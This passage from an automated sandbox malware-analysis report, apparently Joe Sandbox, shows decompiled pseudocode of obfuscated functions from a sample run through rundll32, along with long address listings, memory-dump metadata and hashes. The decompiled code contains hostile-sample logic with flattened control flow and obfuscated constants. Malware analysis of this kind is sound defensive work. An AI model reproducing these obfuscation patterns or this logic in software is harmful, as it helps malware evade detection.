				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x353dfc; // 0x0
						_t374 = E0033CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E00337FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x353dfc; // 0x0
									_t384 = E0033CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E00348519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}





























































                                                                                                                    0x00335e67
                                                                                                                    0x00335e71
                                                                                                                    0x00335e72
                                                                                                                    0x00335e79
                                                                                                                    0x00335e7b
                                                                                                                    0x00335e7c
                                                                                                                    0x00335e7d
                                                                                                                    0x00335e82
                                                                                                                    0x00335e8d
                                                                                                                    0x00335e90
                                                                                                                    0x00335e94
                                                                                                                    0x00335e9b
                                                                                                                    0x00335ea0
                                                                                                                    0x00335ea8
                                                                                                                    0x00335eb6
                                                                                                                    0x00335ebb
                                                                                                                    0x00335ec5
                                                                                                                    0x00335eca
                                                                                                                    0x00335ed0
                                                                                                                    0x00335ed8
                                                                                                                    0x00335ee0
                                                                                                                    0x00335ee5
                                                                                                                    0x00335eea
                                                                                                                    0x00335ef2
                                                                                                                    0x00335efd
                                                                                                                    0x00335f08
                                                                                                                    0x00335f13
                                                                                                                    0x00335f1b
                                                                                                                    0x00335f23
                                                                                                                    0x00335f2b
                                                                                                                    0x00335f33
                                                                                                                    0x00335f3b
                                                                                                                    0x00335f43
                                                                                                                    0x00335f4b
                                                                                                                    0x00335f53
                                                                                                                    0x00335f57
                                                                                                                    0x00335f5f
                                                                                                                    0x00335f67
                                                                                                                    0x00335f70
                                                                                                                    0x00335f73
                                                                                                                    0x00335f77
                                                                                                                    0x00335f7f
                                                                                                                    0x00335f8c
                                                                                                                    0x00335f95
                                                                                                                    0x00335f99
                                                                                                                    0x00335f9e
                                                                                                                    0x00335fa6
                                                                                                                    0x00335fae
                                                                                                                    0x00335fb6
                                                                                                                    0x00335fbe
                                                                                                                    0x00335fc6
                                                                                                                    0x00335fd1
                                                                                                                    0x00335fd9
                                                                                                                    0x00335fe4
                                                                                                                    0x00335fec
                                                                                                                    0x00335ff6
                                                                                                                    0x00335ffa
                                                                                                                    0x00336002
                                                                                                                    0x0033600a
                                                                                                                    0x00336012
                                                                                                                    0x00336017
                                                                                                                    0x0033601c
                                                                                                                    0x00336024
                                                                                                                    0x00336035
                                                                                                                    0x00336038
                                                                                                                    0x0033603c
                                                                                                                    0x00336044
                                                                                                                    0x0033604c
                                                                                                                    0x00336054
                                                                                                                    0x0033605c
                                                                                                                    0x00336064
                                                                                                                    0x00336069
                                                                                                                    0x00336071
                                                                                                                    0x00336079
                                                                                                                    0x00336081
                                                                                                                    0x00336091
                                                                                                                    0x0033609a
                                                                                                                    0x0033609d
                                                                                                                    0x003360a1
                                                                                                                    0x003360a9
                                                                                                                    0x003360b1
                                                                                                                    0x003360b9
                                                                                                                    0x003360be
                                                                                                                    0x003360c6
                                                                                                                    0x003360ce
                                                                                                                    0x003360d6
                                                                                                                    0x003360e2
                                                                                                                    0x003360e6
                                                                                                                    0x003360ee
                                                                                                                    0x003360f6
                                                                                                                    0x003360fe
                                                                                                                    0x00336106
                                                                                                                    0x0033610e
                                                                                                                    0x00336116
                                                                                                                    0x0033611e
                                                                                                                    0x00336126
                                                                                                                    0x0033612e
                                                                                                                    0x00336136
                                                                                                                    0x0033613b
                                                                                                                    0x00336148
                                                                                                                    0x0033614b
                                                                                                                    0x0033614f
                                                                                                                    0x00336157
                                                                                                                    0x00336167
                                                                                                                    0x0033616b
                                                                                                                    0x00336173
                                                                                                                    0x0033617b
                                                                                                                    0x00336183
                                                                                                                    0x00336188
                                                                                                                    0x00336190
                                                                                                                    0x00336194
                                                                                                                    0x0033619c
                                                                                                                    0x003361a9
                                                                                                                    0x003361aa
                                                                                                                    0x003361ae
                                                                                                                    0x003361b6
                                                                                                                    0x003361be
                                                                                                                    0x003361c6
                                                                                                                    0x003361ce
                                                                                                                    0x003361dc
                                                                                                                    0x003361e8
                                                                                                                    0x003361f0
                                                                                                                    0x003361fa
                                                                                                                    0x003361ff
                                                                                                                    0x00336207
                                                                                                                    0x0033620f
                                                                                                                    0x00336214
                                                                                                                    0x0033621c
                                                                                                                    0x00336224
                                                                                                                    0x00336232
                                                                                                                    0x00336237
                                                                                                                    0x0033623d
                                                                                                                    0x00336246
                                                                                                                    0x0033624b
                                                                                                                    0x00336251
                                                                                                                    0x00336259
                                                                                                                    0x00336261
                                                                                                                    0x00336265
                                                                                                                    0x0033626a
                                                                                                                    0x00336272
                                                                                                                    0x00336284
                                                                                                                    0x00336289
                                                                                                                    0x00336292
                                                                                                                    0x0033629d
                                                                                                                    0x003362a5
                                                                                                                    0x003362a9
                                                                                                                    0x003362ae
                                                                                                                    0x003362b6
                                                                                                                    0x003362be
                                                                                                                    0x003362c6
                                                                                                                    0x003362ce
                                                                                                                    0x003362d6
                                                                                                                    0x003362de
                                                                                                                    0x003362f0
                                                                                                                    0x003362f8
                                                                                                                    0x003362ff
                                                                                                                    0x0033630a
                                                                                                                    0x00336312
                                                                                                                    0x0033631a
                                                                                                                    0x0033631f
                                                                                                                    0x00336327
                                                                                                                    0x00336335
                                                                                                                    0x00336418
                                                                                                                    0x0033647f
                                                                                                                    0x00336484
                                                                                                                    0x0033648b
                                                                                                                    0x003364c8
                                                                                                                    0x003364ca
                                                                                                                    0x003364d2
                                                                                                                    0x0033648d
                                                                                                                    0x0033648d
                                                                                                                    0x00000000
                                                                                                                    0x0033648d
                                                                                                                    0x0033633b
                                                                                                                    0x00336341
                                                                                                                    0x0033640e
                                                                                                                    0x00000000
                                                                                                                    0x00336347
                                                                                                                    0x0033634d
                                                                                                                    0x003363ec
                                                                                                                    0x003363ed
                                                                                                                    0x003363ee
                                                                                                                    0x003363f3
                                                                                                                    0x003363fe
                                                                                                                    0x00336404
                                                                                                                    0x00000000
                                                                                                                    0x00336404
                                                                                                                    0x00336353
                                                                                                                    0x00336359
                                                                                                                    0x003364b1
                                                                                                                    0x003364b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003364bd
                                                                                                                    0x0033635f
                                                                                                                    0x0033635f
                                                                                                                    0x003363bd
                                                                                                                    0x003363c2
                                                                                                                    0x003363c9
                                                                                                                    0x003363cf
                                                                                                                    0x00000000
                                                                                                                    0x003363cf
                                                                                                                    0x003363c9
                                                                                                                    0x00336359
                                                                                                                    0x0033634d
                                                                                                                    0x00336341
                                                                                                                    0x003364e1
                                                                                                                    0x003364e1
                                                                                                                    0x003364a6
                                                                                                                    0x003364ac
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                    • API String ID: 0-1604698900
                                                                                                                    • Opcode ID: 1a5d96de5c87f2e57039ac73138e36b82d84e1c7c6d04bca6fd711733bca8d25
                                                                                                                    • Instruction ID: d773339c1f922cb401703196ea098bb2957b424f25b9e93789845295d20652fc
                                                                                                                    • Opcode Fuzzy Hash: 1a5d96de5c87f2e57039ac73138e36b82d84e1c7c6d04bca6fd711733bca8d25
                                                                                                                    • Instruction Fuzzy Hash: BDF10E715087449FD369CF66D58AA4BFBF1FB84B48F10891DF29A86260D7B28949CF03
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Version$ClipboardFormatRegister
                                                                                                                    • String ID: MSWHEEL_ROLLMSG
                                                                                                                    • API String ID: 2888461884-2485103130
                                                                                                                    • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                    • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                    • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                    • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034CB5B Relevance: 10.3, Strings: 8, Instructions: 335COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0034CB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E003420B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E0034DCF7(_v1596, 0x3310f0, __eflags);
							E0034176B( &_v1560, __eflags);
							_t382 =  *0x353e10; // 0x0
							_t385 =  *0x353e10; // 0x0
							E0034E32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E0033A8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E003446BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E0033AB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E0034DCF7(_v1624, 0x331020, __eflags);
					E0034176B( &_v1560, __eflags);
					_t399 =  *0x353e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E00341652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E0033A8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}




























































                                                                                                                    0x0034cb65
                                                                                                                    0x0034cb6c
                                                                                                                    0x0034cb6e
                                                                                                                    0x0034cb75
                                                                                                                    0x0034cb7c
                                                                                                                    0x0034cb7d
                                                                                                                    0x0034cb7e
                                                                                                                    0x0034cb83
                                                                                                                    0x0034cb8e
                                                                                                                    0x0034cb91
                                                                                                                    0x0034cb9a
                                                                                                                    0x0034cba1
                                                                                                                    0x0034cba6
                                                                                                                    0x0034cbb1
                                                                                                                    0x0034cbbc
                                                                                                                    0x0034cbc7
                                                                                                                    0x0034cbd5
                                                                                                                    0x0034cbd8
                                                                                                                    0x0034cbdc
                                                                                                                    0x0034cbe4
                                                                                                                    0x0034cbec
                                                                                                                    0x0034cbf4
                                                                                                                    0x0034cbfc
                                                                                                                    0x0034cc04
                                                                                                                    0x0034cc0c
                                                                                                                    0x0034cc11
                                                                                                                    0x0034cc19
                                                                                                                    0x0034cc21
                                                                                                                    0x0034cc29
                                                                                                                    0x0034cc31
                                                                                                                    0x0034cc36
                                                                                                                    0x0034cc3e
                                                                                                                    0x0034cc46
                                                                                                                    0x0034cc4e
                                                                                                                    0x0034cc56
                                                                                                                    0x0034cc5e
                                                                                                                    0x0034cc66
                                                                                                                    0x0034cc6e
                                                                                                                    0x0034cc76
                                                                                                                    0x0034cc7e
                                                                                                                    0x0034cc86
                                                                                                                    0x0034cc93
                                                                                                                    0x0034cc97
                                                                                                                    0x0034cc9f
                                                                                                                    0x0034cca7
                                                                                                                    0x0034ccaf
                                                                                                                    0x0034ccb7
                                                                                                                    0x0034ccbf
                                                                                                                    0x0034ccc7
                                                                                                                    0x0034ccd4
                                                                                                                    0x0034ccd8
                                                                                                                    0x0034cce0
                                                                                                                    0x0034cce8
                                                                                                                    0x0034ccf0
                                                                                                                    0x0034ccfb
                                                                                                                    0x0034cd06
                                                                                                                    0x0034cd11
                                                                                                                    0x0034cd19
                                                                                                                    0x0034cd23
                                                                                                                    0x0034cd27
                                                                                                                    0x0034cd2f
                                                                                                                    0x0034cd37
                                                                                                                    0x0034cd44
                                                                                                                    0x0034cd48
                                                                                                                    0x0034cd50
                                                                                                                    0x0034cd58
                                                                                                                    0x0034cd60
                                                                                                                    0x0034cd68
                                                                                                                    0x0034cd75
                                                                                                                    0x0034cd7b
                                                                                                                    0x0034cd83
                                                                                                                    0x0034cd8b
                                                                                                                    0x0034cd93
                                                                                                                    0x0034cd9b
                                                                                                                    0x0034cda0
                                                                                                                    0x0034cda8
                                                                                                                    0x0034cdb0
                                                                                                                    0x0034cdb5
                                                                                                                    0x0034cdbd
                                                                                                                    0x0034cdc5
                                                                                                                    0x0034cdcd
                                                                                                                    0x0034cdd5
                                                                                                                    0x0034cde1
                                                                                                                    0x0034cde4
                                                                                                                    0x0034cde8
                                                                                                                    0x0034cded
                                                                                                                    0x0034cdf5
                                                                                                                    0x0034ce02
                                                                                                                    0x0034ce06
                                                                                                                    0x0034ce0e
                                                                                                                    0x0034ce16
                                                                                                                    0x0034ce1e
                                                                                                                    0x0034ce29
                                                                                                                    0x0034ce34
                                                                                                                    0x0034ce3f
                                                                                                                    0x0034ce47
                                                                                                                    0x0034ce54
                                                                                                                    0x0034ce58
                                                                                                                    0x0034ce60
                                                                                                                    0x0034ce68
                                                                                                                    0x0034ce70
                                                                                                                    0x0034ce7a
                                                                                                                    0x0034ce7d
                                                                                                                    0x0034ce81
                                                                                                                    0x0034ce89
                                                                                                                    0x0034ce91
                                                                                                                    0x0034ce99
                                                                                                                    0x0034cea1
                                                                                                                    0x0034cea5
                                                                                                                    0x0034ceaa
                                                                                                                    0x0034ceb2
                                                                                                                    0x0034ceba
                                                                                                                    0x0034cec2
                                                                                                                    0x0034ceca
                                                                                                                    0x0034cecf
                                                                                                                    0x0034ced7
                                                                                                                    0x0034cee2
                                                                                                                    0x0034ceed
                                                                                                                    0x0034cef8
                                                                                                                    0x0034cf00
                                                                                                                    0x0034cf09
                                                                                                                    0x0034cf0e
                                                                                                                    0x0034cf14
                                                                                                                    0x0034cf1c
                                                                                                                    0x0034cf24
                                                                                                                    0x0034cf29
                                                                                                                    0x0034cf35
                                                                                                                    0x0034cf38
                                                                                                                    0x0034cf3c
                                                                                                                    0x0034cf44
                                                                                                                    0x0034cf4c
                                                                                                                    0x0034cf51
                                                                                                                    0x0034cf5b
                                                                                                                    0x0034cf65
                                                                                                                    0x0034cf72
                                                                                                                    0x0034cf7a
                                                                                                                    0x0034cf7f
                                                                                                                    0x0034cf87
                                                                                                                    0x0034cf8f
                                                                                                                    0x0034cf97
                                                                                                                    0x0034cf9f
                                                                                                                    0x0034cfa7
                                                                                                                    0x0034cfaf
                                                                                                                    0x0034cfbd
                                                                                                                    0x0034cfc2
                                                                                                                    0x0034cfcd
                                                                                                                    0x0034cfd0
                                                                                                                    0x0034cfd4
                                                                                                                    0x0034cfdc
                                                                                                                    0x0034cfe7
                                                                                                                    0x0034cfef
                                                                                                                    0x0034cff6
                                                                                                                    0x0034d001
                                                                                                                    0x0034d014
                                                                                                                    0x0034d01b
                                                                                                                    0x0034d026
                                                                                                                    0x0034d02e
                                                                                                                    0x0034d036
                                                                                                                    0x0034d03e
                                                                                                                    0x0034d046
                                                                                                                    0x0034d056
                                                                                                                    0x0034d05e
                                                                                                                    0x0034d061
                                                                                                                    0x0034d065
                                                                                                                    0x0034d06d
                                                                                                                    0x0034d075
                                                                                                                    0x0034d07a
                                                                                                                    0x0034d082
                                                                                                                    0x0034d082
